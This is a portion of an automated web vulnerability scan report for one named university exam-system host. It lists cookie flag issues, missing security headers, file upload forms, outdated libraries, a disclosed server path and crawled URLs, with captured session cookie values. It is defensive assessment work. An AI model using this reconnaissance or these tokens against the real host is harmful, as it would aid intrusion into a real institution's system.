draft-west-first-party-cookies-07: Same-site Cookies (https://tools.ietf.org/html/draft-west-first-party-cookies-07)

Affected items

Web Server
Verified vulnerability
Details
List of cookies with missing, inconsistent or contradictory properties:

71
http://dev-ubk.polindra.ac.id/auth

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7; expires=Sun, 23-Jul-2023 08:

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

72
http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

Cookie was set with:

Set-Cookie: ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7; expires=Sun, 23-Jul-2023 08:

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=0b57b17a5b2e069adde5eec511d9b749; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: ci_session=0j0b0kohcb8uepq96l728kttk66ktdci; expires=Sun, 23-Jul-2023 08:

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/index.php

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

73
http://dev-ubk.polindra.ac.id/

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/auth/cek_login

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/index.php

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/dashboard/

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/edit/1

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

74
http://dev-ubk.polindra.ac.id/users/edit_info

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/edit_info

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/edit_info

Cookie was set with:

Set-Cookie: ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7; expires=Sun, 23-Jul-2023 08:

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/change_password

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

http://dev-ubk.polindra.ac.id/users/change_password

Cookie was set with:

Set-Cookie: ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7; expires=Sun, 23-Jul-2023 08:

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

75
http://dev-ubk.polindra.ac.id/users/change_password

Cookie was set with:

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

This cookie has the following issues:

- Cookie without SameSite attribute.

When cookies lack the SameSite attribute, Web browsers may apply different and sometim

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Cookies without HttpOnly flag set

Severity Low
Reported by module /RPA/Cookie_Without_HttpOnly.js

Description

One or more cookies don't have the HttpOnly flag set. When a cookie is set with the HttpOnly flag, it instructs the browser
that the cookie can only be accessed by the server and not by client-side scripts. This is an important security protection for
session cookies.

Impact

Cookies can be accessed by client-side scripts.

76
Recommendation

If possible, you should set the HttpOnly flag for these cookies.

Affected items

Web Server
Verified vulnerability
Details
Cookies without HttpOnly flag set:

http://dev-ubk.polindra.ac.id/auth

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=0b57b17a5b2e069adde5eec511d9b749; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/index.php

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/auth/cek_login

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

77
http://dev-ubk.polindra.ac.id/index.php

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/users/edit/1

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/users/edit_info

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/users/edit_info

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/users/change_password

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/users/change_password

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/dashboard/

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/users/edit_info

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/dosen

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/hasilujian

78
Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

http://dev-ubk.polindra.ac.id/dosen/delete

Set-Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15; expires=Sun, 23-Jul-20

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Content Security Policy (CSP) not implemented

Severity Informational
Reported by module /httpdata/CSP_not_implemented.js

Description

Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks,
including Cross Site Scripting (XSS) and data injection attacks.

Content Security Policy (CSP) can be implemented by adding a Content-Security-Policy header. The value of this header
is a string containing the policy directives describing your Content Security Policy. To implement CSP, you should define
lists of allowed origins for the all of the types of resources that your site utilizes. For example, if you have a simple site that
needs to load scripts, stylesheets, and images hosted locally, as well as from the jQuery library from their CDN, the CSP
header could look like the following:

79
Content-Security-Policy:

default-src 'self';

script-src 'self' https://code.jquery.com;

It was detected that your web application doesn't implement Content Security Policy (CSP) as the CSP header is missing
from the response. It's recommended to implement Content Security Policy (CSP) into your web application.

Impact

CSP can be used to prevent and/or mitigate attacks that involve content/code injection, such as cross-site scripting/XSS
attacks, attacks that require embedding a malicious resource, attacks that involve malicious use of iframes, such as
clickjacking attacks, and others.

Recommendation

It's recommended to implement Content Security Policy (CSP) into your web application. Configuring Content Security
Policy involves adding the Content-Security-Policy HTTP header to a web page and giving it values to control resources
the user agent is allowed to load for that page.

References

Content Security Policy (CSP) (https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP)

Implementing Content Security Policy (https://hacks.mozilla.org/2016/02/implementing-content-security-policy/)

Affected items

Web Server
Details

80
Paths without CSP header:

http://dev-ubk.polindra.ac.id/auth

http://dev-ubk.polindra.ac.id/dashboard/hasil_ujian

http://dev-ubk.polindra.ac.id/dashboard/

http://dev-ubk.polindra.ac.id/users/edit/1

http://dev-ubk.polindra.ac.id/dosen

http://dev-ubk.polindra.ac.id/hasilujian

http://dev-ubk.polindra.ac.id/jurusan

http://dev-ubk.polindra.ac.id/kelas

http://dev-ubk.polindra.ac.id/kelasdosen

http://dev-ubk.polindra.ac.id/mahasiswa

http://dev-ubk.polindra.ac.id/settings

http://dev-ubk.polindra.ac.id/soal

http://dev-ubk.polindra.ac.id/users

http://dev-ubk.polindra.ac.id/ujian/master

http://dev-ubk.polindra.ac.id/soal/import

http://dev-ubk.polindra.ac.id/settings/

http://dev-ubk.polindra.ac.id/soal/

http://dev-ubk.polindra.ac.id/hasilujian/

http://dev-ubk.polindra.ac.id/kelasdosen/

http://dev-ubk.polindra.ac.id/mahasiswa/

http://dev-ubk.polindra.ac.id/ujian/add

Request headers

81
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Content type is not specified

Severity Informational
Reported by module /RPA/Content_Type_Missing.js

Description

These page(s) does not set a Content-Type header value. This value informs the browser what kind of data to expect. If
this header is missing, the browser may incorrectly handle the data. This could lead to security problems.

Impact

None

Recommendation

Set a Content-Type header value for these page(s).

Affected items

Web Server
Verified vulnerability
Details
Pages where the content-type header is not specified:

http://dev-ubk.polindra.ac.id/composer.lock

82
Request headers
GET /composer.lock HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

File uploads

Severity Informational
Reported by module /Crawler/12-Crawler_File_Upload.js

Description

These pages allows visitors to upload files to the server. Various web applications allow users to upload files (such as
pictures, images, sounds, ...). Uploaded files may pose a significant risk if not handled correctly. A remote attacker could
send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Impact

If the uploaded files are not safely checked an attacker may upload malicious files.

Recommendation

Restrict file types accepted for upload: check the file extension and only allow certain files to be uploaded. Use a whitelist
approach instead of a blacklist. Check for double extensions such as .php.png. Check for files without a filename like
.htaccess (on ASP.NET, check for configuration files like web.config). Change the permissions on the upload folder so the
files within it are not executable. If possible, rename the files that are uploaded.

Affected items

Web Server
Details

83
Pages with file upload forms:

http://dev-ubk.polindra.ac.id/soal/import

Form name: <empty>

Form action: http://dev-ubk.polindra.ac.id/soal/preview/soal
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/mahasiswa/import

Form name: <empty>

Form action: http://dev-ubk.polindra.ac.id/mahasiswa/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/dosen/import

Form name: <empty>

Form action: http://dev-ubk.polindra.ac.id/dosen/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/kelas/import

Form name: <empty>

Form action: http://dev-ubk.polindra.ac.id/kelas/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/jurusan/import

Form name: <empty>

Form action: http://dev-ubk.polindra.ac.id/jurusan/preview
Form method: POST
Form file input: upload_file [file]

http://dev-ubk.polindra.ac.id/soal/add

Form name: <empty>

Form action: http://dev-ubk.polindra.ac.id/soal/save
Form method: POST
Form file input: file_soal [file]

Request headers

84
GET /soal/import HTTP/1.1

Referer: http://dev-ubk.polindra.ac.id/soal

Cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

No HTTP Redirection

Severity Informational
Reported by module /target/http_redirections.js

Description

It was detected that your web application uses HTTP protocol, but doesn't automatically redirect users to HTTPS.

Impact

In some circumstances, it could be used for a man-in-the-middle (MitM) attack

Recommendation

It's recommended to implement best practices of HTTP Redirection into your web application. Consult web references for
more information

References

HTTP Redirections (https://infosec.mozilla.org/guidelines/web_security#http-redirections)

Affected items

Web Server
Details

Request headers

85
GET / HTTP/1.1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

Outdated JavaScript libraries

Severity Informational
Reported by module /Scripts/PerFile/Javascript_Libraries_Audit.script

Description

You are using an outdated version of one or more JavaScript libraries. A more recent version is available. Although your
version was not found to be affected by any security vulnerabilities, it is recommended to keep libraries up to date.

Impact

Consult References for more information.

Recommendation

Upgrade to the latest version.

Affected items

Web Server
Details

bootstrap.js 3.3.7
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/js/bootstrap.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/twbs/bootstrap/releases

Request headers

86
GET /assets/bower_components/bootstrap/dist/js/bootstrap.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

Select2 4.0.3
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/select2/select2.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/select2/select2/tags

Request headers

87
GET /assets/dist/auth/vendor/select2/select2.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

moment.js 2.13.0
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/daterangepicker/moment.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/moment/moment/tags

Request headers

88
GET /assets/dist/auth/vendor/daterangepicker/moment.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

bootstrap.js 4.0.0-beta
URL: http://dev-ubk.polindra.ac.id/assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/twbs/bootstrap/releases

Request headers

89
GET /assets/dist/auth/vendor/bootstrap/js/bootstrap.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Referer: http://dev-ubk.polindra.ac.id/auth

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

Select2 4.0.6-rc.1
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/select2/js/select2.full.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/select2/select2/tags

Request headers

90
GET /assets/bower_components/select2/js/select2.full.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

DataTables 1.10.19
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/DataTables/DataTables/tags

Request headers

91
GET /assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Web Server
Details

DataTables 1.5.6
URL: http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/js/dataTables.buttons.min.js
Detection method: The library's name and version were determined based on the file's contents.
References:
https://github.com/DataTables/DataTables/tags

Request headers

92
GET /assets/bower_components/datatables.net-bs/plugins/Buttons-
1.5.6/js/dataTables.buttons.min.js HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

accept-language: en-US

accept: */*

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=9rpffgqt38bgkuefb75v61ubfisvrjg7

Referer: http://dev-ubk.polindra.ac.id/dashboard

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Possible server path disclosure (Unix)

Severity Informational
Reported by module /httpdata/text_search.js

Description

One or more fully qualified path names were found. From this information the attacker may learn the file system structure
from the web server. This information can be used to conduct further attacks.

This alert may be a false positive, manual confirmation is required.

Impact

Possible sensitive information disclosure.

Recommendation

Prevent this information from being displayed to the user.

References

Full Path Disclosure (https://www.owasp.org/index.php/Full_Path_Disclosure)

Affected items

Web Server
Details

93
Pages with paths being disclosed:

http://dev-ubk.polindra.ac.id/auth
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/ujian/master
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/import
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview/soal
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/ujian/add
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/preview/
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/users/edit/
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/users/data/
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/soal/save
/www/wwwroot/dev
http://dev-ubk.polindra.ac.id/users/data
/www/wwwroot/dev

Request headers
GET /auth HTTP/1.1

Host: dev-ubk.polindra.ac.id

Pragma: no-cache

Cache-Control: no-cache

upgrade-insecure-requests: 1

accept-language: en-US

accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/
*;q=0.8,application/signed-exchange;v=b3;q=0.9

cookie: csrf_cookie_name=3b88cd89d8fcecd13ee41aa591693f15;
ci_session=1kpdhd6u0koi17ognqadbu4253f6f6q9

Accept-Encoding: gzip,deflate,br

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Reverse proxy detected

Severity Informational

94
Reported by module /target/RevProxy_Detection.js

Description

This server uses a reverse proxy, a load balancer or a CDN (Content Delivery Network) or it's hosted in a cloud provider.
Acunetix detected this by sending various payloads and detecting changes in headers and body.

Impact

No impact is associated with this vulnerability.

Recommendation

None

Affected items

Web Server
Details
Detected reverse proxy: Apache httpd
Request headers
GET /dashboard HTTP/1.1

Max-Forwards: 0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Encoding: gzip,deflate,br

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like

Gecko) Chrome/99.0.4844.0 Safari/537.36

Host: dev-ubk.polindra.ac.id

Connection: Keep-alive

95
Scanned items (coverage report)
http://dev-ubk.polindra.ac.id/
http://dev-ubk.polindra.ac.id/assets/
http://dev-ubk.polindra.ac.id/assets/bower_components/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap-datetimepicker/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap-datetimepicker/bootstrap-datetimepicker.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap-datetimepicker/bootstrap-datetimepicker.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/css/bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/fonts/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/dist/js/bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/bootstrap/fonts/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/lib/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/lib/codemirror.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/lib/codemirror.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/mode/
http://dev-ubk.polindra.ac.id/assets/bower_components/codemirror/mode/xml.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/css/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/css/dataTables.bootstrap.min.css
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/dataTables.bootstrap.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/js/jquery.dataTables.min.js
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/
http://dev-ubk.polindra.ac.id/assets/bower_components/datatables.net-bs/plugins/Buttons-1.5.6/css/
